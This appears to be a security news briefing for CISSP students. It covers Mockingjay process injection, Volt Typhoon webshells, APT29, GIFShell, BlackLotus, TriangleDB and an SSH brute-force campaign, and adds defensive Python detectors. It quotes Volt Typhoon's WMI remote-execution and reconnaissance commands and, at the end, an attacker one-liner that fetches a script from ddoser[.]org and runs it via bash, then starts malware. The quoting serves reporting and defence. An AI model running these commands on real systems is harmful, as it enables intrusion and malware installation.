Les Bell and Associates Pty Ltd
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
New Process Injection Technique Can Bypass Detection by EDR Products
An increasingly common technique used by malware authors to evade detection is process injection: inserting malicious code into the address space of an existing, trusted process and arranging for that process to execute it. Because the code is executing within the context of a trusted process, it is hard for security tools to detect, and in some cases the technique allows completely file-less exploitation, leaving behind no artifacts on the victim's disk to be examined by malware analysts.
A new process injection technique developed by researchers at Israeli security firm Security Joes is able to evade detection by endpoint detection and response (EDR) applications. The new technique, which its developers call "Mockingjay", does not use Windows API calls such as VirtualAlloc(), VirtualAllocEx(), WriteProcessMemory() and others, which EDR applications typically hook as a means of detecting and blocking their use.
Instead, their new technique leverages a vulnerable dynamic link library - one which possesses a default Read/Write/Execute (RWX) memory section, which can then be abused to inject the desired code. Since the DLL already has RWX memory, this eliminates the need to make calls to memory allocation APIs, or to NtWriteVirtualMemory() and NtProtectVirtualMemory(), which are also closely monitored by EDR software.
The researchers wrote a tool to scan the entire Windows filesystem for such a DLL, and found one: msys-2.0.dll, which is shipped with Visual Studio 2022 Community Edition. This DLL has a 16 KB RWX section - an ideal space for code injection and execution.
The next step was to find a method that could leverage this without making the monitored API calls. Their first approach is to load the vulnerable DLL directly and then find the RWX memory area, using the LoadLibraryW() and GetModuleInformation() API calls (neither of which EDR products normally treat as suspicious). In a proof-of-concept, this was then used to run code, based on the Hell's Gate technique, which builds its own system call stubs and invokes system calls directly, removing the EDR's user-mode hooks and allowing further activity without observation.
A second approach is to perform process injection on a remote process, again relying on the RWX memory section in msys-2.0.dll. It turns out that this DLL is commonly used by applications that require POSIX emulation, such as GNU utilities, some of which are found in Visual Studio 2022 Community Edition. For their proof-of-concept, the researchers successfully injected code into the ssh.exe (Secure Shell) process, causing it to load yet another DLL which created a reverse shell to a remote machine. The only limitation of this technique is that the targeted DLL (in this case msys-2.0.dll) cannot use Address Space Layout Randomization (ASLR), as that would require dynamic resolution of the address of the RWX memory section.
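The property Mockingjay depends on - a section that is mapped RWX by default, in an image that does not opt in to ASLR - is visible in the PE headers alone, so a defender can hunt for such DLLs in exactly the way the researchers did. The following is an added example, written for this briefing and not taken from the Security Joes write-up or their tooling: a stdlib-only Python scan that parses the DOS, COFF and optional headers plus the section table, reports any section whose characteristics carry READ, WRITE and EXECUTE together, and notes whether DllCharacteristics has DYNAMIC_BASE set. The two sample images it builds are constructed, headers-only files, not loadable DLLs; the file names are made up.

```python
"""Added example, not from the Security Joes write-up or tooling: a stdlib-only
scan for PE images that map a section readable, writable and executable by
default (the property Mockingjay needs in msys-2.0.dll), plus a report of
whether the image opts in to ASLR (DYNAMIC_BASE), which would defeat the
fixed-address variant. Only the headers and section table are parsed. The
sample images produced by build_sample_pe() are constructed, not real DLLs."""
import os
import struct
import tempfile

IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040


def pe_rwx_sections(data):
    """Return (rwx_sections, dynamic_base) for the bytes of a PE file.

    rwx_sections is a list of (name, virtual_size, characteristics) for every
    section whose Characteristics carry READ, WRITE and EXECUTE together;
    dynamic_base is True when DllCharacteristics has DYNAMIC_BASE (ASLR) set."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    # DllCharacteristics sits at offset 70 of the optional header in both PE32 and PE32+.
    dllchar = struct.unpack_from("<H", data, opt + 70)[0]
    found = []
    for i in range(nsect):
        hdr = opt + opt_size + 40 * i                    # IMAGE_SECTION_HEADER is 40 bytes
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, _va, _rawsz, _rawptr, _, _, _, _, chars = struct.unpack_from(
            "<IIIIIIHHI", data, hdr + 8)
        if chars & RWX == RWX:
            found.append((name, vsize, chars))
    return found, bool(dllchar & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)


def scan_tree(root, head_bytes=8192):
    """Walk root and yield (path, rwx_sections, dynamic_base) for each .dll/.exe
    with at least one RWX section. Only the first head_bytes are read, which
    covers the headers and section table of any normally laid-out image."""
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".dll", ".exe")):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    rwx, dyn = pe_rwx_sections(fh.read(head_bytes))
            except (OSError, ValueError, struct.error):
                continue                                  # unreadable or not a PE: skip
            if rwx:
                yield path, rwx, dyn


def build_sample_pe(data_section_flags, dynamic_base):
    """Construct a headers-only PE32 image with a .text (RX) and a .data section."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xE0                                       # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x2102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<H", opt, 70,
                     IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE if dynamic_base else 0)

    def section(name, flags):
        return name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", 0x4000, 0x1000, 0x4000, 0x400, 0, 0, 0, 0, flags)

    return (dos + b"PE\0\0" + coff + bytes(opt)
            + section(b".text", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE)
            + section(b".data", data_section_flags))


def demo():
    """Write one RWX, non-ASLR sample and one benign sample to a temp dir and scan it."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "rwx-noaslr.dll"), "wb") as fh:        # constructed name
        fh.write(build_sample_pe(IMAGE_SCN_CNT_INITIALIZED_DATA | RWX, False))
    with open(os.path.join(root, "benign.dll"), "wb") as fh:            # constructed name
        fh.write(build_sample_pe(IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ
                                 | IMAGE_SCN_MEM_WRITE, True))
    return list(scan_tree(root))


if __name__ == "__main__":
    for path, rwx, dyn in demo():
        for name, vsize, _ in rwx:
            print(f"{path}: section {name} is RWX ({vsize:#x} bytes), ASLR={'on' if dyn else 'off'}")
```

Pointing scan_tree() at a Windows system drive lists every image that offers an injector a ready-made RWX region; the hits without DYNAMIC_BASE are the ones that match the technique as described above, and each is a candidate for an EDR exclusion review or a vendor query.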
The Security Joes blog article contains a detailed write-up which is effectively a well-written tutorial on process injection techniques. It also provides some recommendations on detection techniques.
Peixoto, Thiago, Felipe Duarte and Ido Naor, Process Mockingjay: Echoing RWX In Userland To Achieve Code Execution, blog post, 27 June 2023. Available online at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution.
Europol Investigation Leads to 6,558 Arrests
Back in 2020, French and Dutch police forces were able to infiltrate the operations of EncroChat, an encrypted mobile messaging service that offered its users - mainly criminals - hardened Android phones with just the features they needed: strong encryption, rapid device erasure with a specific PIN or remote deletion by the EncroChat help desk, and a tamper-proof boot process. Despite the high price of both the device and its subscription service, EncroChat sold like hot cakes, with tens of thousands of users worldwide.
The Joint Investigation Team established by the French and Dutch authorities with assistance from Eurojust and Europol was able to intercept, share and analyse over 115 million criminal conversations, by over 60,000 users. Based on the accumulated statistics from the many countries who used the shared data over the next three years, the results are:
- 6,558 suspects arrested, including 197 High Value Targets
- 7,134 years of imprisonment of convicted criminals up to now
- €739.7 million in cash seized
- €154.1 million frozen in assets or bank accounts
- 30.5 million drug pills seized
- 103.5 tonnes of cocaine seized
- 163.4 tonnes of cannabis seized
- 3.3 tonnes of heroin seized
- 971 vehicles seized
- 271 estates or homes seized
- 923 weapons seized, as well as 21,750 rounds of ammunition and 68 explosives
- 83 boats and 40 planes seized
The investigation, conducted at Europol's headquarters under the name "Operational Task Force EMMA", also prevented violent attacks, attempted murders, large-scale drug importations and corruption. And while many of EncroChat's customers fled to another service called SkyECC, this was also penetrated and dismantled in 2021.
All in all, an impressive result.
Europol, Dismantling encrypted criminal EncroChat communications leads to over 6 500 arrests and close to EUR 900 million seized, news release, 27 June 2023. Available online at https://www.europol.europa.eu/media-press/newsroom/news/dismantling-encrypted-criminal-encrochat-communications-leads-to-over-6-500-arrests-and-close-to-eur-900-million-seized.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
News Stories
Chinese APT Targets Critical Infrastructure, OT
Researchers at managed security provider Crowdstrike have released a report on an incident involving a Chinese-nexus threat actor which they track as VANGUARD PANDA (also known as Volt Typhoon). The cyber-espionage group consistently targets Zoho ManageEngine ADSelfService Plus in order to obtain initial access, after which it deploys webshells and makes use of living-off-the-land techniques to avoid leaving behind detectable artifacts which could be used as IOCs.
In this particular incident, Crowdstrike's Falcon Complete managed-detection-and-response was triggered by suspicious reconnaissance commands - such as listing processes, testing network connectivity, gathering user and group information, and using WMI to enumerate domain trust and DNS zones - executed under an Apache Tomcat web application server running ManageEngine ADSelfService Plus. The use of these commands indicated a familiarity with the target environment, as the commands were executed rapidly and used specific internal hostnames and passwords:
cmd /C "tasklist /svc"
cmd /C "ping -n 1 [redacted]"
cmd /C "ping -n 1 -a [redacted]"
cmd /C "net group "domain controllers" /dom"
cmd /C "net use \\[redacted]\admin$ REDACTED /u:[redacted]"
cmd /C "dir \\[redacted]\c$\Users"
cmd /C "wmic /node:[redacted] /user:[redacted] /password:"<removed>" process call create "cmd /c nltest /DOMAIN_TRUSTS >>C:\Users\[redacted]\AppData\Local\[redacted].tmp""
cmd /C "dir \\[redacted]\c$\users\[redacted]\AppData\Local\Temp\[redacted].tmp"
cmd /C "type \\[redacted]\c$\users\[redacted]\AppData\Local\Temp\[redacted].tmp"
cmd /C "wmic /node:[redacted] /user:[redacted] /password:"<removed>" process call create "cmd /c Dnscmd . /EnumZones >>C:\Users\[redacted]\AppData\Local\Temp\[redacted].tmp""
cmd /C "dir \\[redacted]\c$\users\[redacted]\AppData\Local\Temp\[redacted].tmp"
cmd /C "type \\[redacted]\c$\users\[redacted]\AppData\Local\Temp\[redacted].tmp"
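What made these commands detectable was not any one of them - tasklist or ping from an administrator's console is routine - but their parent: a shell spawned by the Tomcat java.exe hosting ADSelfService Plus. The following is an added example, written for this briefing and not CrowdStrike's own detection content: detection logic that runs over process-creation events, looks through the cmd /C wrapper, and flags the reconnaissance patterns from the list above only when the shell's parent is a web application server process. The event records, host names, account names and file names are constructed stand-ins for the redacted values.

```python
"""Added example, not CrowdStrike's detection content: flag reconnaissance
commands run by a shell that a web application server (Tomcat's java.exe here)
spawned, the pattern in the command list above. The events are constructed in
the shape of a process-creation record (host, parent image, image, command
line); host, account and file names are invented stand-ins for redactions."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


# Tomcat runs as java.exe or the tomcatN.exe service wrapper; w3wp.exe covers IIS.
WEB_SERVER_PARENTS = {"java.exe", "tomcat8.exe", "tomcat9.exe", "tomcat10.exe", "w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Applied to the whole command line, so the cmd /C "..." wrapper is seen through.
RECON_PATTERNS = {
    "process listing": re.compile(r"\btasklist\b", re.I),
    "reverse DNS lookup": re.compile(r"\bping\b.*\s-a\s", re.I),
    "domain group enumeration": re.compile(r"\bnet\s+group\b.*\s/dom", re.I),
    "admin share mapping with credentials": re.compile(r"\bnet\s+use\s+\\\\\S+\\(admin|c)\$", re.I),
    "remote file access via admin share": re.compile(r"\b(dir|type)\s+\\\\\S+\\c\$\\", re.I),
    "remote execution via WMI": re.compile(r"\bwmic\b.*\bprocess\s+call\s+create\b", re.I),
    "domain trust enumeration": re.compile(r"\bnltest\b.*/domain_trusts", re.I),
    "DNS zone enumeration": re.compile(r"\bdnscmd\b.*/enumzones", re.I),
}


def _basename(path):
    """Last path component, tolerant of Windows separators on any host."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return the recon labels matched by one event, or [] when the event is not a
    shell spawned by a web server process (the same commands from an administrator's
    interactive console are normal and would only be noise)."""
    if _basename(event.parent_image) not in WEB_SERVER_PARENTS:
        return []
    if _basename(event.image) not in SHELLS:
        return []
    return [label for label, rx in RECON_PATTERNS.items() if rx.search(event.command_line)]


def triage(events):
    """Collapse hits per host: [(host, sorted technique labels)] for hosts with any hit.
    A single hit already merits a ticket (a web server has no business running tasklist);
    the number of distinct techniques indicates urgency rather than acting as a threshold."""
    per_host = defaultdict(set)
    for ev in events:
        for label in classify(ev):
            per_host[ev.host].add(label)
    return sorted((host, sorted(labels)) for host, labels in per_host.items())


TOMCAT = r"C:\ManageEngine\ADSelfService Plus\jre\bin\java.exe"   # constructed path
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [  # constructed; dc01, svc_adss and out.tmp stand in for the redacted values
    ProcEvent("adss01", TOMCAT, CMD, 'cmd /C "tasklist /svc"'),
    ProcEvent("adss01", TOMCAT, CMD, 'cmd /C "ping -n 1 -a dc01"'),
    ProcEvent("adss01", TOMCAT, CMD, 'cmd /C "net group "domain controllers" /dom"'),
    ProcEvent("adss01", TOMCAT, CMD, r'cmd /C "net use \\dc01\admin$ REDACTED /u:corp\svc_adss"'),
    ProcEvent("adss01", TOMCAT, CMD,
              r'cmd /C "wmic /node:dc01 /user:corp\svc_adss /password:"REDACTED" process call create '
              r'"cmd /c nltest /DOMAIN_TRUSTS >>C:\Users\svc_adss\AppData\Local\Temp\out.tmp""'),
    ProcEvent("adss01", TOMCAT, CMD, r'cmd /C "type \\dc01\c$\users\svc_adss\AppData\Local\Temp\out.tmp"'),
    ProcEvent("adss01", TOMCAT, CMD, r'cmd /C "dir C:\ManageEngine\logs"'),      # no recon pattern
    ProcEvent("wks17", r"C:\Windows\explorer.exe", CMD, "tasklist /svc"),      # admin at a console
]

if __name__ == "__main__":
    for host, labels in triage(SAMPLE_EVENTS):
        print(f"{host}: {len(labels)} recon techniques from a web-server-spawned shell")
        for label in labels:
            print(f"  - {label}")
```

The parent-process condition is the whole point: it is what turns a list of ordinary administrative commands into a high-fidelity alert, and it is the condition a webshell operator cannot avoid tripping, however carefully they clean the logs afterwards.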
At this point the Crowdstrike team quickly quarantined and triaged the host, notifying the impacted customer while analysing the Apache Tomcat access logs. This revealed multiple POST requests to the file /html/promotion/selfsdp.jspx which, upon analysis, turned out to be a webshell capable of running arbitrary commands by using the /C option of the classic Windows shell, cmd.exe and the ProcessBuilder class. It also attempted to masquerade as part of ManageEngine ADSelfService Plus, using that as its page title and adding legitimate links to help desk software. In fact, selfsdp.jspx will match the EncryptJSP YARA rule provided in a May CISA advisory on Volt Typhoon.
However, a lot of red flags remained: for example, the use of hostnames above indicated a lot of prior reconnaissance and enumeration, and the inclusion of passwords indicated that admin accounts had already been compromised - likely before the Falcon Complete sensor had been installed. Indeed, the selfsdp.jspx webshell had been written to disk almost six months before the Falcon sensor was installed, and examination of the Apache Tomcat logs correlated its installation with an HTTP POST request to /html/error.jsp - but that file no longer existed, indicating its deletion in an attempt to evade detection and analysis. A lot of related log entries had also vanished - on one day, the entire first 12 hours of the access log had gone.
To cut a long story short - Crowdstrike's blog article provides the full details - the threat actor eventually slipped up. .jsp and .jspx pages - JavaServer Pages - contain scriptlets of Java code which are extracted to create .java Java source code files and then compiled into the corresponding .class bytecode files for execution. This is done by a component of Apache Tomcat - the Jasper 2 JSP engine - which places the .java and .class files in a separate directory structure (the Tomcat work directory), and while the intruder cleaned up the log files and other artifacts, they missed these.
One of them, ListName_jsp.java, in turn deployed a backdoored version of the tomcat-websocket.jar Apache Tomcat library incorporating a webshell. The replacement was then timestomped - its timestamps set to match those of the original tomcat-websocket.jar - so that it would appear not to have been replaced (although obviously a file integrity checker would detect its changed digest value).
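Both of the intruder's mistakes above are cheap to hunt for without an EDR. The following is an added example, written for this briefing and not part of the CrowdStrike write-up: it walks Tomcat's work directory, maps each Jasper-generated <page>_jsp.java or .class file back to the page it was compiled from and reports any whose source page no longer exists, and it compares library jars against a baseline of digests so that a timestomped replacement is caught regardless of its modification time. The Tomcat-like tree is constructed in a temporary directory; the Jasper naming rule assumed is dir/page.jsp -> org/apache/jsp/dir/page_jsp.java, and page names that Jasper must mangle into legal Java identifiers are not handled.

```python
"""Added example, not part of the CrowdStrike write-up: two hunts for the
artifacts described above. (1) Jasper keeps the generated <page>_jsp.java and
.class files under Tomcat's work directory after the source page is deleted,
so a compiled page with no surviving source is the slip-up that exposed this
intrusion. (2) A jar whose mtime still matches the original but whose digest
does not has been replaced and timestomped. The tree is constructed in a temp
directory; the Jasper naming rule assumed is dir/page.jsp ->
org/apache/jsp/dir/page_jsp.java (identifier-mangled names are not handled)."""
import hashlib
import os
import re
import tempfile

JASPER_RE = re.compile(r"(.*)_(jsp|jspx)\.(java|class)$")
ORIGINAL_MTIME = 1_600_000_000          # constructed install time for the sample jar


def generated_to_source(rel_path):
    """'html/promotion/selfsdp_jspx.java' (relative to org/apache/jsp) -> 'html/promotion/selfsdp.jspx'."""
    m = JASPER_RE.fullmatch(rel_path.replace(os.sep, "/"))
    return f"{m.group(1)}.{m.group(2)}" if m else None


def orphaned_jsp_artifacts(work_dir, webapp_dir):
    """Return sorted [(generated file, missing source page)] for Jasper output without a source."""
    base = os.path.join(work_dir, "org", "apache", "jsp")
    orphans = []
    for dirpath, _, files in os.walk(base):
        for fn in files:
            rel = os.path.relpath(os.path.join(dirpath, fn), base).replace(os.sep, "/")
            src = generated_to_source(rel)
            if src and not os.path.exists(os.path.join(webapp_dir, src)):
                orphans.append((rel, src))
    return sorted(orphans)


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def tampered_jars(lib_dir, baseline):
    """baseline maps jar name -> (sha256, mtime) recorded from a known-good install.
    Return [(jar, mtime_matches)] for every jar whose digest differs; mtime_matches
    True means the replacement was timestomped and a timestamp review would miss it."""
    bad = []
    for name, (digest, mtime) in sorted(baseline.items()):
        path = os.path.join(lib_dir, name)
        if os.path.exists(path) and sha256_of(path) != digest:
            bad.append((name, int(os.path.getmtime(path)) == int(mtime)))
    return bad


def build_sample_tomcat():
    """Constructed tree: a webapp with two live pages, Jasper output for four pages
    (two whose sources were deleted), and a backdoored, timestomped tomcat-websocket.jar."""
    root = tempfile.mkdtemp()
    webapp = os.path.join(root, "webapps", "adssp")
    work = os.path.join(root, "work", "Catalina", "localhost", "adssp")
    lib = os.path.join(root, "lib")
    jsp_out = os.path.join(work, "org", "apache", "jsp")

    def put(path, content=b"x"):
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)

    put(os.path.join(webapp, "index.jsp"))
    put(os.path.join(webapp, "html", "promotion", "selfsdp.jspx"))
    for gen in ("index_jsp.java", "index_jsp.class", "html/promotion/selfsdp_jspx.java",
                "html/error_jsp.java", "html/error_jsp.class", "ListName_jsp.java"):
        put(os.path.join(jsp_out, *gen.split("/")))

    jar = os.path.join(lib, "tomcat-websocket.jar")
    put(jar, b"PK\x03\x04 clean tomcat-websocket.jar (constructed)")
    os.utime(jar, (ORIGINAL_MTIME, ORIGINAL_MTIME))
    baseline = {"tomcat-websocket.jar": (sha256_of(jar), os.path.getmtime(jar))}
    put(jar, b"PK\x03\x04 backdoored tomcat-websocket.jar (constructed)")
    os.utime(jar, (ORIGINAL_MTIME, ORIGINAL_MTIME))     # timestomp back to the original mtime
    return work, webapp, lib, baseline


def demo():
    work, webapp, lib, baseline = build_sample_tomcat()
    return orphaned_jsp_artifacts(work, webapp), tampered_jars(lib, baseline)


if __name__ == "__main__":
    orphans, jars = demo()
    for gen, src in orphans:
        print(f"compiled page without source: {gen}  (source was {src})")
    for name, stomped in jars:
        print(f"digest mismatch: {name}  mtime {'matches original (timestomped)' if stomped else 'changed'}")
```

On a real server the baseline comes from a clean Tomcat distribution of the same version, and the work directory is the one under CATALINA_BASE/work/Catalina/<host>/<context>; an orphan there is worth pulling for analysis before anyone restarts Tomcat, since a redeploy can clear it.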
The Crowdstrike blog article makes fascinating reading and includes some recommendations for detection and mitigation of this attack, which is just one of many the firm has seen against US-based critical infrastructure.
CISA, People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection, cybersecurity advisory AA23-144a, 24 May 2023. Available online at https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a.
Falcon Complete Team, Business as Usual: Falcon Complete MDR Thwarts Novel VANGUARD PANDA (Volt Typhoon) Tradecraft, blog post, 22 June 2023. Available online at https://www.crowdstrike.com/blog/falcon-complete-thwarts-vanguard-panda-tradecraft/.
Cozy Bear At It Again
In a series of tweets, Microsoft Threat Intelligence has reported a rise in credential attack activity by the Russian state-sponsored APT29, a.k.a. Cozy Bear and NOBELIUM, which the Redmondites track as Midnight Blizzard (I wish they would stick to bears and pandas - it makes life a lot easier!). The attacks target governments, IT service providers, NGOs, defense contractors and critical manufacturing, using a variety of password spray, brute force and token theft techniques, as well as session replay attacks using stolen session credentials likely acquired via illicit sale in dark web markets or Telegram channels.
In this campaign the threat actor is using residential proxy services to hide the real source of their attacks. Residential proxies are low-cost or free proxies running on ordinary home connections and resold by a variety of service providers - I have even seen home users being invited to install proxy software under the pretext that it will get them additional bandwidth (it won't) or in return for a small income. The problem is that the main purpose of such proxies is to disguise the source of online activity for a variety of dodgy or disreputable purposes (which means that home users who naively install them are likely to see their IP addresses blacklisted), although they do have a few legitimate uses, especially in states which restrict their citizens' access to information.
APT29's use of residential proxies for a brief period before moving on also makes it harder for defenders to distinguish these attacks from legitimate traffic and block them.
Microsoft Threat Intelligence, "Microsoft has detected increased credential attack activity...", Twitter thread, 22 June 2023. Available online at https://twitter.com/MsftSecIntel/status/1671579358031486991.
News Stories
GIFShell Attack Exploits Teams; Exfiltrates Data Through MS Servers
A new exfiltration technique allows attackers who compromise Microsoft Teams users to exfiltrate data through Microsoft's own servers, making the exfiltration hard to spot by endpoint security products and firewalls, since it looks like legitimate Teams traffic.
The technique, named GIFShell, uses a reverse shell that delivers malicious commands via base64-encoded GIF files in Teams, and exfiltrates the output, also as GIFs, via the Teams infrastructure. The attacker must first somehow convince a user to install a malicious backdoor that executes commands and uploads the results via a GIF URL to a Teams webhook. The backdoor scans the Teams logs for messages with a GIF, extracts the base64-encoded commands and executes them, converting the output to base64 text which is used as the filename for a remote GIF embedded in a Microsoft Teams Survey card that is submitted to the attacker's public webhook.
Microsoft has acknowledged the GIFShell attack, but will not issue a fix, stating that no security boundaries were bypassed, this being a post-exploitation technique.
Johnson, Mic, Understanding the Microsoft Teams Vulnerability: The GIFShell Attack, Latest Hacking News, 20 June 2023. Available online at https://latesthackingnews.com/2023/06/20/understanding-the-microsoft-teams-vulnerability-the-gifshell-attack/.
Verizon 2023 DBIR Available
From the "Dammit - we meant to post this weeks ago" department: Verizon's annual Data Breach Investigations Report is always an interesting read, and we go hunting for it every April/May, when it usually appears. This year's appeared a few weeks ago and is, as usual, very informative. Some interesting factoids:
- 83% of breaches involved external actors, with the majority of attacks financially motivated, while 19% involved internal actors (sometimes unintentionally, through misuse or human error)
- 24% of all breaches involved ransomware; it was used in 62% of incidents committed by organized crime and 59% of financially-motivated incidents
- 50% of all social engineering incidents used pretexting - scenarios invented to trick the victim into giving up information or doing something to enable a breach
- 74% of breaches involve human factors: errors, privilege misuse, theft of credentials or social engineering
- 95% of breaches are financially motivated
It certainly seems like we could obtain high returns from increased efforts in the human factors (education, training and awareness) aspects of our business.
Uncredited, 2023 Data Breach Investigations Report, Verizon, 2023. Available online at https://www.verizon.com/business/en-au/resources/reports/dbir/.
News Stories
NSA Issues Guidance on BlackLotus
The National Security Agency has issued a mitigation guide for the BlackLotus bootkit. We reported on BlackLotus back in March, following an initial report from ESET, although the malware had been available since at least October 2022. It works by exploiting CVE-2022-21894, a vulnerability which was fixed by Microsoft in their January 2022 updates. However, the affected boot binaries were not added to the UEFI Secure Boot Deny List Database (DBX), and BlackLotus works by carrying its own copies of those older, still validly signed binaries - a technique referred to as "Baton Drop".
The NSA guide recommends a number of actions:
- Update recovery media and activate optional mitigations
- Harden defensive policies
- Monitor device integrity measurements and boot configuration
- Customize UEFI Secure Boot
It is important to bear in mind that BlackLotus is not a firmware implant, but a bypass of the Secure Boot process, and it can be removed or quarantined. Currently, it is only known to affect Windows 10 and 11, but fixes are also available for Windows 8.1. Although BlackLotus does contain some Linux boot binaries, Linux is not one of its targets. Linux admins can defend their systems by removing the Microsoft Windows Production PCA 2011 certificate from Secure Boot's DB - bearing in mind that this also stops any Windows boot loader signed by that certificate from starting on the same machine, so it is not an option for dual-boot systems.
National Security Agency, BlackLotus Mitigation Guide, cybersecurity information, ver 1.0, June 2023. Available online at https://media.defense.gov/2023/Jun/22/2003245723/-1/-1/0/CSI_BlackLotus_Mitigation_Guide.PDF.
News Stories
Apple Issues Urgent Patches for 0days
Apple has issued urgent patches for two vulnerabilities in the iOS and iPadOS mobile device operating systems, in response to claims the vulnerabilities are being exploited in the wild.
The vulnerabilities are
- CVE-2023-32434: Integer overflow in the kernel due to inadequate input validation
- CVE-2023-32439: Type confusion in Webkit
The vulnerabilities were used by an implant discovered by Kaspersky researchers and attributed to a campaign which they have named Operation Triangulation. CVE-2023-32434 is used during initial exploitation, in order to gain root privileges before deploying the implant in memory - as a result, the implant cannot survive a reboot, and the attackers have to install it again by sending an iMessage with a malicious attachment. If the device is not rebooted, the implant normally removes itself after 30 days, although this can be extended.
Once running, the implant communicates with its C2 server via a RESTful HTTPS API, implemented with the Protobuf library. All traffic takes the form of key-value pairs, encrypted with either 3DES or RSA. The implant sends heartbeat messages, while the C2 server sends any of 24 commands for
- Interacting with the filesystem (creation, modification, exfiltration and removal of files)
- Interacting with processes (listing and terminating them)
- Dumping the victim’s keychain items, which can be useful for harvesting victim credentials
- Monitoring the victim’s geolocation
- Running additional modules, which are Mach-O executables loaded by the implant. These executables are reflectively loaded, with their binaries stored only in memory
The implant is written in Objective-C, which leaves some debugging information, such as the names of class members and methods, in the generated binary. Curiously, many of the resources accessed and operations performed by the implant are given database-related names - for example, a directory is referred to as a table, while a file is called a record, and the C2 server is a DB server - which led the Kaspersky researchers to name the implant TriangleDB.
Kucherin, Georgy, Leonid Bezvershenko and Igor Kuznetsov, Dissecting TriangleDB, a Triangulation spyware implant, blog post, 21 June 2023. Available online at https://securelist.com/triangledb-triangulation-implant/110050/.
Useful Ransomware Educational Resources
With ransomware being seen by the business community as one of the biggest, if not the biggest, current security threat, it is important to keep ourselves and our business principals well-informed about its evolution. A couple of useful resources have appeared in the last couple of days to assist with this.
First, Sophos has started to release a three-part documentary series entitled "Think You Know Ransomware?", compiled from over 100 hours of interviews with cybercriminals, security experts, industry analysts and policy makers. The first episode, "Origins of Cybercrime" is now available, with episodes 2 and 3 due for release over the next two weeks.
Meanwhile, at the Infosecurity Europe conference, Richard de la Torre, marketing manager at Bitdefender, gave a talk on the myths and misconceptions which surround ransomware. In his talk he describes how proactive defenders are making use of threat intelligence to prevent or disrupt attacks, as well as increasingly using decryptors to recover data. However, as de la Torre points out, ransomware operators are now putting much more effort into information exfiltration, taking time to stealthily move throughout the victim's networks, identifying the most valuable datasets as well as discovering whether they have cyber insurance.
Sophos, Think You Know Ransomware?, documentary series, June 2023. Available online at https://www.sophos.com/en-us/content/ransomware-documentary.
Raywood, Dan, Ransomware Misconceptions Abound, To the Benefit of Attackers, Dark Reading, 22 June 2023. Available online at https://www.darkreading.com/vulnerabilities-threats/ransomware-misconceptions-abound-to-the-benefit-of-attackers.
News Stories
Attacks on Poorly-Secured Linux Servers via sshd
Security researchers at South Korea's AhnLab Security Emergency Response Center have uncovered a campaign being run by an unknown threat actor against poorly-managed Linux servers via the SSH daemon (sshd). Once the actor has gained initial access, they install a range of malware, including the Tsunami DDoS bot, ShellBot, the XMRig Monero cryptominer and Log Cleaner.
Initial access seems to be gained through a brute force attack using common weak credentials (seriously - who uses "abcdefghi" or "123@abc" as a password on the root account?). From this point, a command line is pasted in which downloads and runs a variety of malware:
# nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c;nproc;ip a | grep glo;uname -a;cd /tmp;wget -O - ddoser[.]org/key|bash;cd /var/tmp;wget ddoser[.]org/a;chmod +x a;./a;wget ddoser[.]org/logo;perl logo irc.undernet.org 6667 -bash;rm -rf logo;wget ddoser[.]org/top;tar -zxvf top;rm -rf top;cd lib32;./go > /dev/null 2>&1 &
